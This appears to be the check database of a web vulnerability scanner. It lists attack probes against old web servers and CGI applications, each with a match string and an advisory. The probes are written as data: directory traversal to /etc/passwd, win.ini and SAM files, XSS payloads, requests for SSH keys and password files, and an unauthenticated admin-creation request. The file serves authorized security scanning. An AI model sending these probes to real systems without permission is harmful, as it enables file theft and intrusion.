servercat,abyss,abyss
servercat,alchemyeye,Alchemy Eye
servercat,apache,apache
servercat,apache,jakarta
servercat,apache,tomcat
servercat,cern,cern
servercat,citrix,citrix
servercat,compaq,CompaqHTTPServer
servercat,dwhttpd,dwhttpd
servercat,goaheadwebs,GoAhead-Webs
servercat,icecast,icecast
servercat,iis,iis
servercat,iis,personal web
servercat,iis,pws
servercat,jrun,jrun
servercat,lotus,domino
servercat,lotus,lotus
servercat,mipcd,mofet
servercat,mycio,mycio
servercat,mywebserver,mywebserver
servercat,ncsa,ncsa
servercat,netscape,iplanet
servercat,netscape,netscape
servercat,novell,netware
servercat,novell,novell
servercat,omnihttpd,OmniHTTPd
servercat,oracle,oracle
servercat,sambar,Sambar
servercat,savant,Savant
servercat,simpleserver,SimpleServer
servercat,tivoli,ADSM_HTTP
servercat,w4,w4
servercat,weblogic,weblogic
servercat,webserver4d,Web_Server_4D
servercat,website,website
########################################################################
# Checks: c,ws type,root,method,file,result,information,data to send
########################################################################
# <script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET
# Cross Site Scripting (XSS). CA-2000-02."
#c,generic,@CGIDIRS,,"Directory Listing",GET,"Directory indexing of CGI directory should be disabled."
#c,lotus,/,"%00.nsf/../lotus/domino/notes.ini",200,GET,"The server allows the notes.ini file to be retrieved."

c,generic,/phpshare/,phpshare.php,200,GET,"Several serious security holes pre 0.6b2. Several minor security holes pre 0.6b3"
c,generic,/w-agora,/,200,GET,"w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install."
c,generic,/,jamdb/,200,GET,"JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot."
c,generic,/,krysalis/,200,GET,"Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot"
c,generic,/,a?<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server."
c,abyss,/,%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini,"[fonts]",GET,"Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version."
c,abyss,/,%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini,"[windows]",GET,"Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version."
c,abyss,/,////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////,"index of",GET,"Abyss 1.03 reveals directory listing when 256 /'s are requested."
c,abyss,/,conspass.chl+,200,GET,"Abyss allows hidden/protected files to be served if a + is added to the request."
c,abyss,/,consport.chl+,200,GET,"Abyss allows hidden/protected files to be served if a + is added to the request."
c,abyss,/,general.chl+,200,GET,"Abyss allows hidden/protected files to be served if a + is added to the request."
c,abyss,/,srvstatus.chl+,200,GET,"Abyss allows hidden/protected files to be served if a + is added to the request."
c,alchemyeye,@CGIDIRS,../../../../../../../../../../WINNT/system32/ipconfig.exe,"IP Configuration",GET,"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
c,alchemyeye,@CGIDIRS,NUL/../../../../../../../../../WINNT/system32/ipconfig.exe,"IP Configuration",GET,"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
c,alchemyeye,@CGIDIRS,PRN/../../../../../../../../../WINNT/system32/ipconfig.exe,"IP Configuration",GET,"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
c,apache,/,"?D=A","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
c,apache,/,"?M=A","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
c,apache,/,"?N=D","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
c,apache,/,"?S=A","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing."
c,apache,/,.DS_Store,"Bud1",GET,"Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version."
c,apache,/,.FBCIndex,"Bud2",GET,"This file son OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html"
c,apache,/,/,"not found for:",OPTIONS,"By sending an OPTIONS request for /, the physical path to PHP can be revealed."
c,apache,/,666%0a%0a<script>alert('Vulnerable');</script>666.jsp,"<script>alert('Vulnerable');</script>",GET,"Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,apache,/,admin.cgi,"Administration",GET,"InterScan VirusWall administration is accessible without authentication."
c,apache,/,blah-whatever.jsp,"JSP file \"",GET,"The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CAN-2000-0759."
c,apache,/,docs/,200,GET,"May give list of installed software"
c,apache,/,index.html.ca,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.cz.iso8859-2,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.de,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.dk,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ee,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.el,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.en,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.es,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.et,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.fr,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.he.iso8859-8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.hr.iso8859-2,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.it,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ja.iso2022-jp,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.kr.iso2022-kr,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ltz.utf8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.lu.utf8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.nl,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.nn,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.no,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.po.iso8859-2,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.pt,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.pt-br,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ru.cp-1251,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ru.cp866,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ru.iso-ru,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ru.koi8-r,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.ru.utf8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.se,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.tw,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.tw.Big5,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,index.html.var,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information."
c,apache,/,lpt9,"FileNotFoundException:",GET,"Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher."
c,apache,/,server-info,200,GET,"This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts."
c,apache,/,server-status,200,GET,"This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts."
c,apache,/,stronghold-info,200,GET,"Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. CAN-2001-0868."
c,apache,/,stronghold-status,200,GET,"Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. CAN-2001-0868."
c,apache,/,test,"test hierarchy",GET,"Apache Tomcat default file found. All default files should be removed."
c,apache,/,test.php,"Current PHP version",GET,"PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information."
c,apache,/cgi-bin/,main_menu.pl,"NetDetector Traffic Analysis",GET,"The NetDetector allows unauthenticated users to perform database queries."
c,apache,/cgi-bin/,printenv,"DOCUMENT_ROOT",GET,"Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed."
c,apache,/cgi-bin/,printenv,"Premature end of script headers: /",GET,"Apache 2.0 printenv default script does not have execute permissions but leaks file system paths."
c,apache,/cgi-bin/,search,"=sourcedir",GET,"Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value)."
c,apache,/cgi-bin/,test-cgi,"PATH_TRANSLATED",GET,"Apache 2.0 default script is executable and reveals system information. All default scripts should be removed."
c,apache,/cgi-bin/,test-cgi,"Premature end of script headers: /",GET,"Apache 2.0 printenv default script does not have execute permissions but leaks file system paths."
c,apache,/content/base/build/explorer/,"none.php?..:..:..:..:..:..:..:etc:passwd:","root:",GET,"SunPS iRunbook Version 2.5.2 allows files to be read remotely."
c,apache,/content/base/build/explorer/,none.php?/etc/passwd,"root:",GET,"SunPS iRunbook Version 2.5.2 allows files to be read remotely."
c,apache,/docs/sdb/en/html/,index.html,"Support Database",GET,"This may be a default SuSe Apache install. This is the support page."
c,apache,/error/,"%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","[windows]",GET,"Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661."
c,apache,/error/,"%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[fonts]",GET,"Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661."
c,apache,/error/,HTTP_NOT_FOUND.html.var,"Available variants",GET,"Apache reveals file system paths when invalid error documents are requested."
c,apache,/examples,/,"Directory Listing",GET,"Directory indexing enabled, also default JSP examples."
c,apache,/examples/jsp/,index.html,"JSP Samples",GET,"Apache Tomcat default JSP pages present."
c,apache,/examples/jsp/,source.jsp??,"Directory Listing",GET,"Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed."
c,apache,/examples/jsp/snp/,snoop.jsp,"Request Information",GET,"Displays information about page retrievals, including other users."
c,apache,/examples/servlet/,TroubleShooter,"TroubleShooter Servlet Output",GET,"Tomcat default jsp page reveals system information and may be vulnerable to XSS."
c,apache,/examples/servlets/,index.html,"Servlet Examples",GET,"Apache Tomcat default JSP pages present."
c,apache,/icons,/,200,GET,"Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used all, the /icons directory should be removed."
c,apache,/interscan,/,"Administration",GET,"InterScan VirusWall administration is accessible without authentication."
c,apache,/jservdocs,/,200,GET,"Default Apache JServ docs should be removed."
c,apache,/manual/images,/,200,GET,"Apache 2.0 directory indexing is enabled, it should only be enabled for specific directories (if required). Apache's manual shouuld be removed and directory indexing disabled."
c,apache,/NetDetector/,middle_help_intro.htm,"NIKSUN-HELP",GET,"The system appears to be a Niksun NetDetector (network monitoring). ÊThe help files should be available at /NetDetector/quick_help_index.html"
c,apache,/php/,php.exe?c:\boot.ini,"boot loader",GET,"The Apache config allows php.exe to be called directly." 
c,apache,/pls/,admin,"ENVIRONMENT",GET,"Oracle Apache+WebDB gives a lot of system information via the pls/admin script"
c,apache,/servlet/org.apache.catalina.ContainerServlet/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
c,apache,/servlet/org.apache.catalina.Context/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
c,apache,/servlet/org.apache.catalina.Globals/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
c,apache,/servlet/org.apache.catalina.servlets.WebdavStatus/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02."
c,apache,/servlets/,MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. CA-2000-02."
c,apache,/site/eg/,source.asp,200,GET,"This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CAN-2000-0628."
c,apache,/soap/servlet/,soaprouter,200,GET,"Oracle 9iAS SOAP components allow anonymous users to deploy applications by default."
c,apache,/test/,realPath.jsp,"WEBROOT",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,buffer1.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,buffer2.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,buffer3.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,buffer4.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,extends1.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,extends2.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,Language.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageAutoFlush.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageDouble.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageExtends.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageImport2.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageInfo.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageInvalid.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageIsErrorPage.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageIsThreadSafe.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/,pageSession.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/test/jsp/declaration/,IntegerOverflow.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
c,apache,/tomcat-docs/,index.html,200,GET,"Default Apache Tomcat documentation found."
c,apache,/~nobody/,etc/passwd,"root:",GET,"Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf."
c,apache,@CGIDIRS,.htaccess,200,GET,"Contains authorization information"
c,apache,@CGIDIRS,test-cgi.bat,200,GET,"This is an Apache for Win default. If Apache is lower than 1.3.23, this can be exploited as in test-cgi.bat?|dir+c:+>..\htdocs\listing.txt, but may not allow data sent back to the browser."
c,cern,/,.wwwacl,200,GET,"Contains authorization information"
c,cern,/,.www_acl,200,GET,"Contains authorization information"
c,cern,@CGIDIRS,.wwwacl,200,GET,"Contains authorization information"
c,cern,@CGIDIRS,.www_acl,200,GET,"Contains authorization information"
c,cern,@CGIDIRS,ls," neither '/",GET,"The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained."
c,citrix,/,applist.asp,200,GET,"Citrix server may allow remote users to view applications installed without authenticating."
c,citrix,/,boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/,"boot loader",GET,"Citrix CGI allows directory traversal."
c,compaq,"http://","127.0.0.1:2301/ HTTP/1.0","Compaq WBEM Device",GET,"The Compaq WBEM interface can act as an HTTP proxy, which can allow firewall or web proxy bypass. http://www.compaq.com/products/servers/management/SSRT0758.html"
c,compaq,/Survey/,Survey.Htm,"System Components",GET,"This Compaq device, without authentication, gives lots of system information."
c,compaq,/WEBAGENT/,CQMGSERV/CF-SINFO.TPF,"General Information",GET,"This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL"
c,dwhttpd,/ab2/,@AdminAddadmin?uid=foo&password=bar&re_password=bar,200,GET,"Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'."
c,dwhttpd,/ab2/,@AdminViewError,200,GET,"Sun Answerbook allows viewing of the error logs without authentication."
c,generic,/%3cscript%3ealert(%22xss%22)%3c/script%3e/,index.html,"<script>alert('Vulnerable')</script>",GET,"Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server."
c,generic,/,"%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","[windows]",GET,"Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher."
c,generic,/,"..%252f..%252f..%252f..%252f..%252f../windows/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%255c..%255c..%255c..%255c..%255c../windows/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%2F..%2F..%2F..%2F..%2F../windows/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"<script>alert('Vulnerable')</script>.jsp","<script>alert('Vulnerable')</script>.jsp",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"<script>alert('Vulnerable')</script>.shtml","<script>alert('Vulnerable')</script>.shtml",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"<script>alert('Vulnerable')</script>.thtml","<script>alert('Vulnerable')</script>.thtml",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"bb000001.pl<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f","<script>alert('Vulnerable')</script>",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview",<script>alert('Vulnerable')</script>,GET,"This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02."
c,generic,/,"ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,"[SecCheck]/..%252f..%252f../ext.ini",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"[SecCheck]/..%255c..%255c../ext.ini",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,"[SecCheck]/..%2f../ext.ini",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information."
c,generic,/,%00/,"Directory listing of",GET,"Remote directories can be retrieved, (this may be a Roxen server), upgrade the server."
c,generic,/,%22%3cscript%3ealert(%22xss%22)%3c/script%3e,"<script>alert('Vulnerable')</script>",GET,"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server."
c,generic,/,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd,"root:",GET,"Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org)."
c,generic,/,%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e,"<script>alert('Vulnerable')</script>",GET,"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server."
c,generic,/,%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e,"<script>alert('Vulnerable')</script>",GET,"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server."
c,generic,/,%3f.jsp,"Directory Listing",GET,"JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL."
c,generic,/,%3f.jsp,"Index of",GET,"JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL."
c,generic,/,................../etc/passwd,"root:",GET,"The web server allows the password file to be retrieved."
c,generic,/,.../.../.../.../.../.../.../.../.../boot.ini,"boot loader",GET,"Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?"
c,generic,/,../../../../../../../../../../etc/passwd,"root:",GET,"It is possible to read files on the server by adding ../ in front of file name."
c,generic,/,..\..\..\..\..\..\temp\temp.class,200,GET,"Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version."
c,generic,/,./,"include\(\"",GET,"Appending '/./' to a directory may reveal php source code."
c,generic,/,.access,200,GET,"Contains authorization information"
c,generic,/,.addressbook,200,GET,"PINE addressbook, may store sensitive e-mail address contact information and notes"
c,generic,/,.bashrc,200,GET,"User home dir was found with a shell rc file. This may reveal file and path information."
c,generic,/,.bash_history,200,GET,"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web."
c,generic,/,.cobalt/sysManage/../admin/.htaccess,"AuthName",GET,"Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory."
c,generic,/,.forward,200,GET,"User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to."
c,generic,/,.history,200,GET,"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web."
c,generic,/,.htaccess,200,GET,"Contains authorization information"
c,generic,/,.htpasswd,200,GET,"Contains authorization information"
c,generic,/,.lynx_cookies,200,GET,"User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites."
c,generic,/,.passwd,200,GET,"Contains authorization information"
c,generic,/,.pinerc,200,GET,"User home dir found with a PINE rc file. May reveal system information, directories and more."
c,generic,/,.plan,200,GET,"User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol "
c,generic,/,.proclog,200,GET,"User home dir with a Procmail log file. May reveal user mail traffic, directories and more."
c,generic,/,.procmailrc,200,GET,"User home dir with a Procmail rc file. May reveal sub directories, mail contacts and more."
c,generic,/,.profile,200,GET,"User home dir with a shell profile was found. May reveal directory information and system configuration."
c,generic,/,.rhosts,200,GET,"A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web."
c,generic,/,.sh_history,200,GET,"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web."
c,generic,/,.ssh,200,GET,"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web."
c,generic,/,.ssh/authorized_keys,200,GET,"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web."
c,generic,/,.ssh/known_hosts,200,GET,"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web."
c,generic,/,/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/,"http://xxxxxxxx/errors/configure_instructions",GET,"Gallery 1.3.0 and below allow PHP files to be included from another domain. Upgrade to the latest version."
c,generic,/,/etc/passwd,"root:",GET,"The server install allows reading of any system file by adding an extra '/' to the URL."
c,generic,/,/profile.php?u=JUNK(8),"Warning:",GET,"Powerboards (http://powerboards.sourceforge.net/) is vulnerable to path disclosure. See http://www.ifrance.com/kitetoua/tuto/powerboards.txt for details."
c,generic,/,<script>alert('Vulnerable')</script>.aspx,"<script>alert('Vulnerable')</script>",GET,"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02."
c,generic,/,?sql_debug=1,"SQL query: ",GET,"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string."
c,generic,/,a%5c.aspx,"Invalid file name for monitoring:",GET,"Older Microsoft .NET installations allow full path disclosure."
c,generic,/,a/,200,GET,"May be Kebi Web Mail administration menu."
c,generic,/,access-log,200,GET,"Just found this log file..."
c,generic,/,access.log,200,GET,"Just found this log file..."
c,generic,/,access/,200,GET,"This might be interesting..."
c,generic,/,account/,200,GET,"This might be interesting..."
c,generic,/,accounting/,200,GET,"This might be interesting..."
c,generic,/,active.log,"WEBactive Http Server",GET,"The WebActive log is accessible remotely."
c,generic,/,add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"AdManager 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 
c,generic,/,add_user.php,"output started at /",GET,"DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,admin.htm,200,GET,"This might be interesting..."
c,generic,/,admin.html,200,GET,"This might be interesting..."
c,generic,/,admin.php,200,GET,"This might be interesting..."
c,generic,/,admin.php3,200,GET,"This might be interesting..."
c,generic,/,admin.php4?reg_login=1,200,GET,"Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected."
c,generic,/,admin.php?en_log_id=0&action=config,200,GET,"EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected."
c,generic,/,admin.php?en_log_id=0&action=users,200,GET,"EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected."
c,generic,/,admin.shtml,200,GET,"This might be interesting..."
c,generic,/,admin/,200,GET,"This might be interesting..."
c,generic,/,admin/contextAdmin/contextAdmin.html,200,GET,"Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin."
c,generic,/,Administration/,200,GET,"This might be interesting..."
c,generic,/,administration/,200,GET,"This might be interesting..."
c,generic,/,administrator/,200,GET,"This might be interesting..."
